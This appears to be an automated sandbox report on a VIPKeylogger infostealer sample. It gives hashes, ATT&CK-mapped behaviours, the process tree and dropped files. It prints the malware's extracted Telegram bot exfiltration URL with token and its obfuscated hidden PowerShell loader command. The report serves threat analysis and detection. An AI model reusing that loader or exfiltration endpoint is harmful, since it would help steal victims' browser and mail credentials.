Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
30/08/2024, 01:40
Static task
static1
Behavioral task
behavioral1
Sample
89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe
Resource
win10v2004-20240802-en
General
-
Target
89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe
-
Size
698KB
-
MD5
0815e4fcd9b75660891ec15ce119fa70
-
SHA1
7f8c1c73194725dce424b72ff2306203f3590c3b
-
SHA256
89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b
-
SHA512
c613b96c177294bbbfce2e0b86d15f32d2c7c579bf4c50ef0940ae697e7cfa0f36512ff7fa221c2a5b6963ca6b000b34876707bdc56351c20d20a3ee54fa68ba
-
SSDEEP
12288:67MJHZFQpHB5LOBTCUbINBoQYwXsCGJt5aFp0zS6w+CAG0snsQc:6IJHoph5CBTCUUN6QYwZrH6VfAsQc
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7480851360:AAFGFIgeYioB7dUKsMFuCrt400Zxu2IugeM/sendMessage?chat_id=6070006284
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4348 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ImagingDevices.exe Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ImagingDevices.exe Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ImagingDevices.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 31 drive.google.com 32 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 checkip.dyndns.org -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\legionrernes.Bac 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4560 ImagingDevices.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4348 powershell.exe 4560 ImagingDevices.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4348 set thread context of 4560 4348 powershell.exe 97 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\underskridelser.ini 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Fonts\battable.ini 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ImagingDevices.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4560 ImagingDevices.exe 4560 ImagingDevices.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4348 powershell.exe Token: SeDebugPrivilege 4560 ImagingDevices.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1608 wrote to memory of 4348 1608 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe 87 PID 1608 wrote to memory of 4348 1608 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe 87 PID 1608 wrote to memory of 4348 1608 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe 87 PID 4348 wrote to memory of 4560 4348 powershell.exe 97 PID 4348 wrote to memory of 4560 4348 powershell.exe 97 PID 4348 wrote to memory of 4560 4348 powershell.exe 97 PID 4348 wrote to memory of 4560 4348 powershell.exe 97 PID 4348 wrote to memory of 4560 4348 powershell.exe 97 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ImagingDevices.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ImagingDevices.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe"C:\Users\Admin\AppData\Local\Temp\89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Kludgy=Get-Content 'C:\Users\Admin\AppData\Local\errancies\Tansies.Tem';$Crushes53=$Kludgy.SubString(52844,3);.$Crushes53($Kludgy)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4560
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
51KB
MD55d38b5b5dd9df5889a8cdae91bda8ce0
SHA155d4f7428bfc7a1c572e2f65d2877f53dfe9b00c
SHA25645c83c93a697679fb2f35ba68b3df5393398970f0adbda0f8af697080a661a07
SHA5129632d65d07e63235746f60133dfeaad9474db92a70d2264300d3f433399b0ca0e647120d3393d07e5f722597ec1e14a4111f9b0819886cb11f646d75c1e6be8d
-
Filesize
315KB
MD5657f4fbdce2aec00af95560a9bb2f05f
SHA105d405cdf1e9b5617ff83d7833d7eb4f011a017b
SHA256dc6ea094e7cd8bb7306cb687eb37b1e8c711ea58c626628cd3c70dc329bdde6d
SHA5129f77c539e9e76a3b9f3b77f5e7a771b23881daefd267cce693e77d40b0cb9a0cfb0371c61d9e5395af20d5395c5b0cc886828099ea136f35b87ef9f6ba638b38